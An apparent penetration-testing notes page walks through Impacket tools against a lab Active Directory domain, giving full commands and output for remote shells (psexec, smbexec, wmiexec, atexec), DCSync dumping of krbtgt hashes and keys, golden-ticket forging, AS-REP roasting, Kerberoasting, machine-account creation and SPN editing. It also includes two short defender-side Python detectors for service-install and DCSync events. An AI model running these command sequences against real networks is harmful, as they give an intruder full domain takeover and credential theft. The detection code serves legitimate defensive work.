Administrator
Published 2024-04-21

3.10 Impacket

I. psexec.py

1. How it works

(1) Uploads a binary over the pipe to the target's C:\Windows directory

(2) Creates a service and runs the binary

(3) Deletes the service and the binary once execution finishes.

(4) Both the binary name and the service name are random.

2. Drawbacks

Creating and deleting the service generates a large number of log entries, and the binary is not AV-evasive.

3. Connection requirements

445/TCP must be open, together with IPC$ or any other writable share (C$ and ADMIN$ are enabled by default), because psexec has to write a file to the target host.

4. Connection walkthrough

(base) C:\root> impacket-psexec sec/administrator:'Az123456@'@172.16.80.189 -debug
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /root/anaconda3/lib/python3.9/site-packages/impacket
[+] StringBinding ncacn_np:172.16.80.189[\pipe\svcctl]
[*] Requesting shares on 172.16.80.189.....
[*] Found writable share ADMIN$
[*] Uploading file FgKDucly.exe
[*] Opening SVCManager on 172.16.80.189.....
[*] Creating service iufT on 172.16.80.189.....
[*] Starting service iufT.....
[!] Press help for extra shell commands
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
Microsoft Windows [�汾 10.0.17763.1339]

[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
(c) 2018 Microsoft Corporation����������Ȩ����

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32>

II. smbexec

1. How it works

(1) Uploads a bat file over the pipe to the target at C:\Windows\temp\execute.bat

(2) Executes the bat file, then deletes it

(3) Reads the command output from the file C:\__output, then deletes that file

2. Drawbacks

Similar to psexec: creating/deleting the service generates a large number of log entries

3. Requirements

Similar to psexec: 445/TCP open, plus IPC$ or any other writable share

4. Connection walkthrough

(base) C:\root> impacket-smbexec sec/administrator:'Az123456@'@172.16.80.189
Impacket v0.11.0 - Copyright 2023 Fortra

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>exit

(base) C:\root> impacket-smbexec sec/administrator:'Az123456@'@172.16.80.189 -debug
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /root/anaconda3/lib/python3.9/site-packages/impacket
[+] StringBinding ncacn_np:172.16.80.189[\pipe\svcctl]
[+] Executing %COMSPEC% /Q /c echo cd  ^> \\%COMPUTERNAME%\C$\__output 2^>^&1 > %SYSTEMROOT%\umNcdMEG.bat & %COMSPEC% /Q /c %SYSTEMROOT%\umNcdMEG.bat & del %SYSTEMROOT%\umNcdMEG.bat
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
[+] Executing %COMSPEC% /Q /c echo whoami ^> \\%COMPUTERNAME%\C$\__output 2^>^&1 > %SYSTEMROOT%\GieYlRjD.bat & %COMSPEC% /Q /c %SYSTEMROOT%\GieYlRjD.bat & del %SYSTEMROOT%\GieYlRjD.bat
nt authority\system

C:\Windows\system32>exit

(base) C:\root>
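Both psexec and smbexec leave a service-installation record (System log Event ID 7045) in the shape shown above: psexec registers a randomly named .exe dropped straight into the Windows directory, smbexec registers a %COMSPEC% one-liner that echoes the command into a .bat, redirects its output to \\<host>\C$\__output and deletes the .bat. As an added defender-side example (not code from the original write-up), the Python below triages constructed 7045-style records against those two patterns; the field names and sample values are assumptions.

```python
import re
from typing import Dict, List, Tuple

# psexec.py pattern from the write-up: a randomly named .exe dropped directly
# into the Windows directory and registered as the service image.
PSEXEC_IMAGE = re.compile(
    r"^(?:%systemroot%|C:\\Windows)\\[A-Za-z]{4,12}\.exe$", re.IGNORECASE)

# smbexec.py pattern from the -debug output above: %COMSPEC% echoes the command
# into a .bat, redirects output to \\<host>\C$\__output, then deletes the .bat.
SMBEXEC_CMD = re.compile(
    r"%COMSPEC%\s+/Q\s+/c\s+echo\s.*__output.*\.bat.*\bdel\b", re.IGNORECASE)


def classify_service_install(event: Dict[str, str]) -> str:
    """Return 'psexec-like', 'smbexec-like' or 'benign' for one 7045 record."""
    image = event.get("ImagePath", "").strip()
    if SMBEXEC_CMD.search(image):
        return "smbexec-like"
    if PSEXEC_IMAGE.match(image):
        return "psexec-like"
    return "benign"


def triage(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (ServiceName, verdict) for every record that is not benign."""
    hits = []
    for ev in events:
        verdict = classify_service_install(ev)
        if verdict != "benign":
            hits.append((ev["ServiceName"], verdict))
    return hits


# Constructed sample records shaped like System log Event ID 7045
# ("A service was installed in the system"); values are not real telemetry.
SAMPLE_7045 = [
    {"ServiceName": "iufT", "ImagePath": r"%systemroot%\FgKDucly.exe",
     "AccountName": "LocalSystem"},
    {"ServiceName": "KzQw",  # constructed random name, as smbexec would use
     "ImagePath": (r"%COMSPEC% /Q /c echo whoami ^> \\%COMPUTERNAME%\C$\__output 2^>^&1 "
                   r"> %SYSTEMROOT%\GieYlRjD.bat & %COMSPEC% /Q /c %SYSTEMROOT%\GieYlRjD.bat "
                   r"& del %SYSTEMROOT%\GieYlRjD.bat"),
     "AccountName": "LocalSystem"},
    {"ServiceName": "Spooler", "ImagePath": r"C:\Windows\System32\spoolsv.exe",
     "AccountName": "LocalSystem"},
    {"ServiceName": "BackupAgent",
     "ImagePath": r'"C:\Program Files\Vendor\agent.exe" --service',
     "AccountName": "NT AUTHORITY\\NetworkService"},
]

if __name__ == "__main__":
    for name, verdict in triage(SAMPLE_7045):
        print(f"[!] service {name}: {verdict}")
```

The same two regexes apply to Security log 4697 (service installed) records, which carry the image path in the ServiceFileName field instead.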

III. wmiexec

1. Connection requirements

(1) The target must have 135/TCP (command execution) and 445/TCP (reading results) open

(2) Depends on ADMIN$

(3) Port 135 is used to execute the command, port 445 to read back the output

2. Connection walkthrough

(base) C:\root> impacket-wmiexec sec/administrator:'Az123456@'@172.16.80.189 -debug
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /root/anaconda3/lib/python3.9/site-packages/impacket
[*] SMBv3.0 dialect used
[+] Target system is 172.16.80.189 and isFQDN is False
[+] StringBinding: win2019-1[53202]
[+] StringBinding: 172.16.80.189[53202]
[+] StringBinding chosen: ncacn_ip_tcp:172.16.80.189[53202]
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
sec\administrator

C:\>exit

(base) C:\root>

IV. atexec

1. How it works

Remotely invokes the target host's Task Scheduler to create a scheduled task, triggers that task manually so the command output is written to a text file, then reads the result over the SMB share.

2. Requirements

(1) Ports: 139 for executing the command, 445 for reading back the output

┌──(root㉿kali)-[~]
└─# impacket-atexec sec/administrator:"Az123456@"@192.168.30.2 whoami
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] This will work ONLY on Windows >= Vista
[*] Creating task \aGbvCMOL
[*] Running task \aGbvCMOL
[*] Deleting task \aGbvCMOL
[*] Attempting to read ADMIN$\Temp\aGbvCMOL.tmp
[*] Attempting to read ADMIN$\Temp\aGbvCMOL.tmp
nt authority\system

Note: atexec runs the command as the target machine's SYSTEM account, even though a domain admin account was used.

V. dcomexec

Uses DCOM to invoke command execution remotely; the available objects have platform restrictions:

1. ShellWindows

Applies to Windows 7, Windows 10, Windows Server 2012 R2.

CLSID: 9BA05972-F6A8-11CF-A442-00A0C90A8F39

2. ShellBrowserWindow

Applies to Windows 10, Windows Server 2012 R2.

CLSID: C08AFD90-F2A1-11D1-8455-00A0C91F3880

3. MMC20

CLSID: 49B2791A-B1AE-4C90-9B8E-E860BA07F889

dcomexec.py's workflow is very similar to wmiexec's: the command output is redirected to a share and then retrieved over an SMB connection.

┌──(root㉿kali)-[~]
└─# impacket-dcomexec administrator:"Az123456@"@192.168.30.2
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[-] DCOM SessionError: unknown error code: 0x800706ba

VI. smbclient

Used to exchange files with the server.

┌──(root㉿kali)-[~]
└─# impacket-smbclient sec/administrator:"Az123456@"@192.168.30.2
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Type help for list of commands
# use C$
# put test.txt
# ls
drw-rw-rw-          0  Mon Jun 17 20:58:04 2024 $Recycle.Bin
drw-rw-rw-          0  Mon Jun 17 20:58:09 2024 $WinREAgent
drw-rw-rw-          0  Thu May 16 11:36:59 2024 Documents and Settings
-rw-rw-rw-      12288  Fri Aug 16 08:39:26 2024 DumpStack.log.tmp
drw-rw-rw-          0  Sat Jun  1 17:12:19 2024 inetpub
-rw-rw-rw- 1342177280  Fri Aug 16 08:39:26 2024 pagefile.sys
drw-rw-rw-          0  Thu May 16 11:34:50 2024 PerfLogs
drw-rw-rw-          0  Fri Aug 16 08:53:06 2024 Program Files
drw-rw-rw-          0  Thu May 16 11:34:50 2024 Program Files (x86)
drw-rw-rw-          0  Mon Jun 17 20:57:58 2024 ProgramData
drw-rw-rw-          0  Thu May 16 11:36:59 2024 Recovery
drw-rw-rw-          0  Sat Jun  1 17:23:03 2024 System Volume Information
-rw-rw-rw-         12  Fri Aug 16 09:26:14 2024 test.txt
drw-rw-rw-          0  Mon Jun 17 20:57:56 2024 Users
drw-rw-rw-          0  Mon Jun 17 21:57:52 2024 Windows
#

VII. secretsdump

Uses DCSync to dump the domain hashes; the account used to connect must have DCSync rights.

┌──(root㉿kali)-[~]
└─# impacket-secretsdump sec/administrator:"Az123456@"@192.168.30.2 -just-dc-user sec/krbtgt
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4c419f69c7f6cbfd5027f273a4fb5236:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:739d1037f7e8453d7cc934548a9a9504a95a1cd77cf0746cb62c58921a643406
krbtgt:aes128-cts-hmac-sha1-96:08acd860886b3d0f5d365c62b76591a7
krbtgt:des-cbc-md5:266e6158fe3b9752
[*] Cleaning up...
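The DRSUAPI replication call above exercises the DS-Replication-Get-Changes control-access rights, which the domain controller records as Directory Service Access events (Security log Event ID 4662) when auditing is enabled. As an added defender-side example (not code from the original write-up), the Python below checks constructed 4662-style records for those rights and alerts on any requester that is not a domain controller's machine account; the field names, the DC list and the IpAddress join are assumptions.

```python
from typing import Dict, Iterable, List

# Control-access-right GUIDs that appear in the Properties field of a 4662
# event when an account replicates directory data (what DRSGetNCChanges does).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}


def dcsync_alerts(events: Iterable[Dict[str, str]],
                  dc_accounts: Iterable[str]) -> List[Dict[str, str]]:
    """Return one alert per 4662 record in which a non-DC account used a
    replication right. Domain controllers replicate legitimately, so their
    machine accounts (e.g. DC1$) are allow-listed; everything else is suspect."""
    allowed = {a.upper() for a in dc_accounts}
    alerts = []
    for ev in events:
        if ev.get("EventID") != "4662":
            continue
        props = ev.get("Properties", "").lower()
        rights = [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]
        if not rights:
            continue  # ordinary directory access, not replication
        if ev.get("SubjectUserName", "").upper() in allowed:
            continue  # a DC pulling changes from its replication partner
        alerts.append({
            "account": ev["SubjectUserName"],
            "source": ev.get("IpAddress", "?"),
            "rights": ", ".join(sorted(rights)),
        })
    return alerts


# Constructed sample events (not real telemetry). A 4662 names the requester in
# SubjectUserName and lists the accessed rights as GUIDs in Properties; the
# IpAddress field is assumed to have been joined in from the matching 4624 logon.
SAMPLE_EVENTS = [
    {"EventID": "4662", "SubjectUserName": "DC2$", "IpAddress": "192.168.30.3",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": "4662", "SubjectUserName": "administrator", "IpAddress": "192.168.30.50",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": "4662", "SubjectUserName": "liang", "IpAddress": "192.168.30.51",
     "Properties": "{00000000-0000-0000-0000-000000000001}"},  # placeholder non-replication GUID
    {"EventID": "4624", "SubjectUserName": "test1", "IpAddress": "192.168.30.52",
     "Properties": ""},
]

if __name__ == "__main__":
    for alert in dcsync_alerts(SAMPLE_EVENTS, ["DC1$", "DC2$"]):
        print(f"[!] possible DCSync by {alert['account']} from {alert['source']}: {alert['rights']}")
```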

VIII. Generating a golden ticket

1. Obtain the domain SID

┌──(root㉿kali)-[~]
└─# impacket-lookupsid test1:"Az123456@"@192.168.30.2
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Brute forcing SIDs at 192.168.30.2
[*] StringBinding ncacn_np:192.168.30.2[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1652425874-2692758975-732503029

2. Obtain the krbtgt hash

Already obtained in step VII.

3. ticketer.py

-user-id defaults to 500

(py38) C:\root\tools\impacket\examples> python3 ticketer.py -aesKey 08acd860886b3d0f5d365c62b76591a7 -domain-sid S-1-5-21-1652425874-2692758975-732503029 -domain sec.com -user-id 500 administrator
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sec.com/administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncAsRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncASRepPart
[*] Saving ticket in administrator.ccache

(py38) C:\root\tools\impacket\examples> export KRB5CCNAME=administrator.ccache

4. Test

(py38) C:\root\tools\impacket\examples> python3 ticketer.py -aesKey 08acd860886b3d0f5d365c62b76591a7 -domain-sid S-1-5-21-1652425874-2692758975-732503029 -domain sec.com -user-id 500 administrator
Impacket v0.12.0.dev1+20240816.161125.5d881ece - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sec.com/administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncAsRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncASRepPart
[*] Saving ticket in administrator.ccache

(py38) C:\root\tools\impacket\examples> export KRB5CCNAME=administrator.ccache

(py38) C:\root\tools\impacket\examples> python3 secretsdump.py -k -no-pass administrator@dc1.sec.com -dc-ip 192.168.30.2 -just-dc-user sec/krbtgt -debug
Impacket v0.12.0.dev1+20240816.161125.5d881ece - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /root/miniconda3/envs/py38/lib/python3.8/site-packages/impacket
[+] Using Kerberos Cache: administrator.ccache
[+] Domain retrieved from CCache: SEC.COM
[+] SPN CIFS/DC1.SEC.COM@SEC.COM not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for KRBTGT/SEC.COM@SEC.COM
[+] Using TGT from cache
[+] Trying to connect to KDC at 192.168.30.2:88
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[+] Trying to connect to KDC at 192.168.30.2:88
[+] Calling DRSCrackNames for sec\krbtgt
[+] Calling DRSGetNCChanges for {8a59bc7a-444e-4b1a-867b-e7a2ce8b044b}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=krbtgt,CN=Users,DC=sec,DC=com
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4c419f69c7f6cbfd5027f273a4fb5236:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Finished processing and printing user's hashes, now printing supplemental information
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:739d1037f7e8453d7cc934548a9a9504a95a1cd77cf0746cb62c58921a643406
krbtgt:aes128-cts-hmac-sha1-96:08acd860886b3d0f5d365c62b76591a7
krbtgt:des-cbc-md5:266e6158fe3b9752
[*] Cleaning up...

(py38) C:\root\tools\impacket\examples>

Reference 1: https://drsuresh.net/articles/kerberos2023

Reference 2: https://labs.lares.com/fear-kerberos-pt3/

Note: In November 2021 Microsoft released security update KB5008380 (authentication updates) to address CVE-2021-42287, also known as Kerberos Key Distribution Center (KDC) confusion. This security-bypass vulnerability affects the Kerberos PAC and, combined with CVE-2021-42278 (sAMAccountName spoofing), allows a potential attacker to impersonate domain controllers; the attack is known as noPAC. Since that update, if the supplied username does not exist in Active Directory, the KDC returns the error KDC_ERR_TGT_REVOKED.

IX. Requesting a TGT (getTGT)

C:\root> impacket-getTGT sec/administrator@192.168.30.2 -dc-ip 192.168.30.2 -debug
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /root/miniconda3/lib/python3.12/site-packages/impacket
Password:
[+] Trying to connect to KDC at 192.168.30.2:88
[+] Trying to connect to KDC at 192.168.30.2:88
[*] Saving ticket in administrator@192.168.30.2.ccache

Note: if the password contains an @ character, it can only be entered interactively, or a hash can be used instead (tested).

X. Requesting a ST (getST)

C:\root> impacket-getST sec/administrator:"Az123456@" -dc-ip 192.168.30.2 -spn cifs/dc1.sec.com -debug
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /root/miniconda3/lib/python3.12/site-packages/impacket
[+] Using Kerberos Cache: administrator.ccache
[+] SPN KRBTGT/SEC@SEC not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] No valid credentials found in cache
[+] Username retrieved from CCache: administrator
[*] Getting TGT for user
[+] Trying to connect to KDC at 192.168.30.2:88
[+] Trying to connect to KDC at 192.168.30.2:88
[+] TGT session key: 2a05c1f235ceec7195d8a868c84303fe703fb74b61579673f5decf5b42922d91
[*] Getting ST for user
[+] Trying to connect to KDC at 192.168.30.2:88
[*] Saving ticket in administrator@cifs_dc1.sec.com@SEC.COM.ccache

C:\root> export KRB5CCNAME=administrator@cifs_dc1.sec.com@SEC.COM.ccache

C:\root> impacket-smbexec -no-pass -k dc1.sec.com
Impacket v0.11.0 - Copyright 2023 Fortra

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system

Note: here getST automatically requests a TGT for us first and then requests the ST. If a TGT is already available, the ST can be requested directly with -k -no-pass, without entering a password.

XI. Obtaining the domain SID

C:\root> impacket-lookupsid test1:"Az123456@"@192.168.30.2
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Brute forcing SIDs at 192.168.30.2
[*] StringBinding ncacn_np:192.168.30.2[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1652425874-2692758975-732503029
498: SEC\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: SEC\Administrator (SidTypeUser)
501: SEC\Guest (SidTypeUser)
502: SEC\krbtgt (SidTypeUser)
512: SEC\Domain Admins (SidTypeGroup)
513: SEC\Domain Users (SidTypeGroup)
514: SEC\Domain Guests (SidTypeGroup)
515: SEC\Domain Computers (SidTypeGroup)
516: SEC\Domain Controllers (SidTypeGroup)
517: SEC\Cert Publishers (SidTypeAlias)
518: SEC\Schema Admins (SidTypeGroup)
519: SEC\Enterprise Admins (SidTypeGroup)
520: SEC\Group Policy Creator Owners (SidTypeGroup)
521: SEC\Read-only Domain Controllers (SidTypeGroup)
522: SEC\Cloneable Domain Controllers (SidTypeGroup)
525: SEC\Protected Users (SidTypeGroup)
526: SEC\Key Admins (SidTypeGroup)
527: SEC\Enterprise Key Admins (SidTypeGroup)
553: SEC\RAS and IAS Servers (SidTypeAlias)
571: SEC\Allowed RODC Password Replication Group (SidTypeAlias)
572: SEC\Denied RODC Password Replication Group (SidTypeAlias)
1000: SEC\liang (SidTypeUser)
1001: SEC\DC1$ (SidTypeUser)
1102: SEC\DnsAdmins (SidTypeAlias)
1103: SEC\DnsUpdateProxy (SidTypeGroup)
1104: SEC\SZ$ (SidTypeUser)
1105: SEC\test1 (SidTypeUser)

XII. Enumerating domain users

C:\root> impacket-samrdump test1:"Az123456@"@192.168.30.2
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Retrieving endpoint list from 192.168.30.2
Found domain(s):
 . SEC
 . Builtin
[*] Looking up users in domain SEC
Found user: Administrator, uid = 500
Found user: Guest, uid = 501
Found user: krbtgt, uid = 502
Found user: liang, uid = 1000
Found user: test1, uid = 1105
Administrator (500)/FullName:
Administrator (500)/UserComment:
Administrator (500)/PrimaryGroupId: 513
Administrator (500)/BadPasswordCount: 0
Administrator (500)/LogonCount: 76
Administrator (500)/PasswordLastSet: 2024-05-16 11:40:03.509594
Administrator (500)/PasswordDoesNotExpire: True
Administrator (500)/AccountIsDisabled: False
Administrator (500)/ScriptPath:
Guest (501)/FullName:
Guest (501)/UserComment:
Guest (501)/PrimaryGroupId: 514
Guest (501)/BadPasswordCount: 0
Guest (501)/LogonCount: 0
Guest (501)/PasswordLastSet: <never>
Guest (501)/PasswordDoesNotExpire: True
Guest (501)/AccountIsDisabled: True
Guest (501)/ScriptPath:
krbtgt (502)/FullName:
krbtgt (502)/UserComment:
krbtgt (502)/PrimaryGroupId: 513
krbtgt (502)/BadPasswordCount: 0
krbtgt (502)/LogonCount: 0
krbtgt (502)/PasswordLastSet: 2024-06-01 17:20:11.793417
krbtgt (502)/PasswordDoesNotExpire: False
krbtgt (502)/AccountIsDisabled: True
krbtgt (502)/ScriptPath:
liang (1000)/FullName:
liang (1000)/UserComment:
liang (1000)/PrimaryGroupId: 513
liang (1000)/BadPasswordCount: 0
liang (1000)/LogonCount: 6
liang (1000)/PasswordLastSet: 2024-05-16 11:36:58.526092
liang (1000)/PasswordDoesNotExpire: False
liang (1000)/AccountIsDisabled: False
liang (1000)/ScriptPath:
test1 (1105)/FullName:
test1 (1105)/UserComment:
test1 (1105)/PrimaryGroupId: 513
test1 (1105)/BadPasswordCount: 0
test1 (1105)/LogonCount: 0
test1 (1105)/PasswordLastSet: 2024-08-16 16:11:24.350370
test1 (1105)/PasswordDoesNotExpire: False
test1 (1105)/AccountIsDisabled: False
test1 (1105)/ScriptPath:
[*] Received 5 entries.

C:\root>

XIII. Adding a machine account (addcomputer)

1. Creation via the SAMR protocol (no SPN)

C:\root> impacket-addcomputer -computer-name 'machine1$' -computer-pass 'Az123456' -dc-ip 192.168.30.2 -method SAMR -debug sec.com/test1:"Az123456@"
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /root/miniconda3/lib/python3.12/site-packages/impacket
[*] Opening domain SEC...
[*] Successfully added machine account machine1$ with password Az123456.

C:\root>
C:\Users\administrator>setspn -L machine1$
Registered ServicePrincipalNames 用于 CN=machine1,CN=Computers,DC=sec,DC=com:

C:\Users\administrator>

2. Creation via the LDAPS protocol; SPNs are created automatically (to be confirmed)

(py38) C:\root> impacket-addcomputer -computer-name 'machine2$' -computer-pass 'Az123456' -dc-ip 192.168.30.2 -method LDAPS -debug sec.com/test1:"Az123456@"
Impacket v0.12.0.dev1+20240816.161125.5d881ece - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /root/miniconda3/envs/py38/lib/python3.8/site-packages/impacket
[*] Successfully added machine account machine2$ with password Az123456.

(py38) C:\root>

C:\Users\administrator>setspn -L machine2$
Registered ServicePrincipalNames 用于 CN=machine2,CN=Computers,DC=sec,DC=com:
        RestrictedKrbHost/machine2.sec.com
        RestrictedKrbHost/machine2
        HOST/machine2.sec.com
        HOST/machine2

C:\Users\administrator>setspn -L machine1$
Registered ServicePrincipalNames 用于 CN=machine1,CN=Computers,DC=sec,DC=com:

Note 1: LDAPS must be enabled on the domain controller first

Note 2: with [domain/]username[:password], no @target follows the password; the target is given with -dc-ip instead

XIV. AS-REP Roasting

With the attacker outside the domain, checks whether the users listed in users.txt have the "Do not require Kerberos preauthentication" attribute set and, for the accounts that do, retrieves the Login Session Key encrypted with the account's hash

(py38) C:\root> cat users.txt
admin
user1
test1
test2

(py38) C:\root> impacket-GetNPUsers -dc-ip 192.168.30.2 -usersfile users.txt -format john sec.com/
Impacket v0.12.0.dev1+20240816.161125.5d881ece - Copyright 2023 Fortra

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User test1 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$test2@SEC.COM:9b6163b2b3e67352480eeca5966593b8$baac4faf2ee03dde3548a75d1a1be1888ffe352cd6d03b65ad647caa785951352ea492c1e675a8633e7cfebfb762200a4f39cbd57ef180d4381cec708e806abb5b010f9c43162cf33a387f7a656da84792afb98bcdf40124e361c51ef0f5b99e0f131e05f8aabeb9cca8a2757ecce4b286df0e68e7fc6b803a93c6da1113115c62681406ae219d480698fef8f15155c750c612f9dc72d380cca3167f14b04513745247f7789689ab544ab2d2c90cc1b1f0c609a0f3885b76a9acb35c2a7fc818b828289ed4540498cf2a62b69e22f0b356343d0ddd8f29f0d64ce54a2a0609cab066

(py38) C:\root>

XV. Kerberoasting (GetUserSPNs)

(py38) C:\root> impacket-GetUserSPNs -dc-ip 192.168.30.2 sec.com/test1:"Az123456@"
Impacket v0.12.0.dev1+20240816.161125.5d881ece - Copyright 2023 Fortra

ServicePrincipalName          Name   MemberOf  PasswordLastSet             LastLogon                   Delegation
----------------------------  -----  --------  --------------------------  --------------------------  ----------
MySQL/dc1.sec.com:3306/MySQL  test1            2024-08-16 16:11:24.350370  2024-08-18 06:21:34.018313

Note: adding -outputfile automatically requests STs for all SPNs registered under the users

XVI. Ticket conversion (ticketConverter)

(py38) C:\root> impacket-ticketConverter administrator.ccache administrator.kirbi
Impacket v0.12.0.dev1+20240816.161125.5d881ece - Copyright 2023 Fortra

[*] converting ccache to kirbi...
[+] done

(py38) C:\root> impacket-ticketConverter administrator.kirbi administrator_convert.ccache
Impacket v0.12.0.dev1+20240816.161125.5d881ece - Copyright 2023 Fortra

[*] converting kirbi to ccache...
[+] done

(py38) C:\root>

XVII. Adding, removing and querying SPNs (addspn.py)

Query

(py38) C:\root\tools\krbrelayx> python3 addspn.py -u "sec.com\administrator" -p "Az123456@" -t "machine2$" -q 192.168.30.2
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
DN: CN=machine2,CN=Computers,DC=sec,DC=com - STATUS: Read - READ TIME: 2024-08-18T06:30:52.485220
    dNSHostName: machine2.sec.com
    sAMAccountName: machine2$
    servicePrincipalName: RestrictedKrbHost/machine2.sec.com
                          RestrictedKrbHost/machine2
                          HOST/machine2.sec.com
                          HOST/machine2

(py38) C:\root\tools\krbrelayx>

Add (requires domain admin rights)

(py38) C:\root\tools\krbrelayx> python3 addspn.py -u "sec.com\administrator" -p "Az123456@" -t "machine2$" -s "test/test" -a 192.168.30.2
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully

(py38) C:\root\tools\krbrelayx>

Remove (only requires modify permission on the target attribute)

(py38) C:\root\tools\krbrelayx> python3 addspn.py -u "sec.com\administrator" -p "Az123456@" -t "machine2$" -s "Host/test" -r 192.168.30.2
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully

(py38) C:\root\tools\krbrelayx>
